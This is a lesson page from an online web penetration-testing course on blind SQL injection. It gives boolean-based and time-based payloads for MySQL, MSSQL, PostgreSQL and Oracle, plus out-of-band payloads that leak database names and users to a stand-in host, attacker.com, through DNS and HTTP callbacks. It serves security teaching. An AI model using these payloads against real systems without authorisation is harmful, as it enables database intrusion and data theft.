Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both Beginner 16 modules 2.7h 0 enrolled

From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.

Instructor

lazyhackers

Curriculum — 5 sections · 16 modules · 2.7h

Now Learning

Blind SQL Injection — When No Data Is Returned

Lesson · 10 min

← Prev Next →

Blind SQLi occurs when the application is vulnerable but returns no visible data — error messages suppressed, no output column available. Infer data bit-by-bit through behavior differences.

Boolean-Based Blind SQLi

# Establish baseline:
https://target.com/item?id=1          # Shows product — TRUE state
https://target.com/item?id=1 AND 1=2  # No product — FALSE state

# Ask yes/no questions about the database:
# "Does first character of database name equal 's'?"
https://target.com/item?id=1 AND SUBSTRING(database(),1,1)='s'
# Product shown? YES = first char is 's'. Not shown? Try next letter.

# Extract full DB name character by character
1 AND SUBSTRING(database(),1,1)='s'   # TRUE
1 AND SUBSTRING(database(),2,1)='h'   # TRUE
1 AND SUBSTRING(database(),3,1)='o'   # TRUE
1 AND SUBSTRING(database(),4,1)='p'   # TRUE
# Database name = 'shop'

# More efficient — binary search using ASCII values
1 AND ASCII(SUBSTRING(database(),1,1))>64   # >64? TRUE
1 AND ASCII(SUBSTRING(database(),1,1))>100  # >100? TRUE
1 AND ASCII(SUBSTRING(database(),1,1))>115  # >115? FALSE
1 AND ASCII(SUBSTRING(database(),1,1))=115  # =115? TRUE = 's'

Time-Based Blind SQLi

# No visible difference in response at all? Use time delays.
# "If condition is true, delay 5 seconds"

# ── MySQL ───────────────────────────────────────────
1' AND SLEEP(5)--                              # Unconditional 5s delay
1' AND IF(1=1,SLEEP(5),0)--                   # Conditional — always true
1' AND IF(database()='shop',SLEEP(5),0)--     # Delay if DB name = 'shop'

# ── MSSQL ────────────────────────────────────────────
1'; IF (1=1) WAITFOR DELAY '0:0:5'--
1'; IF (DB_NAME()='master') WAITFOR DELAY '0:0:5'--

# ── PostgreSQL ───────────────────────────────────────
1'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--

# ── Oracle ───────────────────────────────────────────
1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--

Out-of-Band (OOB) SQLi

# When time-based is too slow — use DNS/HTTP callbacks
# Use Burp Collaborator or interactsh for receiving callbacks

# ── MySQL ────────────────────────────────────────────
' UNION SELECT load_file(CONCAT('\\',database(),'.attacker.com\file'))--
# DNS lookup reveals: shop.attacker.com = DB name is 'shop'

# ── MSSQL ────────────────────────────────────────────
'; EXEC master..xp_dirtree '\attacker.com\share'--
'; DECLARE @v varchar(8000);SELECT @v=db_name();
  EXEC master..xp_dirtree('\'+@v+'.attacker.com\share')--

# ── Oracle ───────────────────────────────────────────
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--

📄

The Pentester Mindset

Lesson · 10m ·Free Preview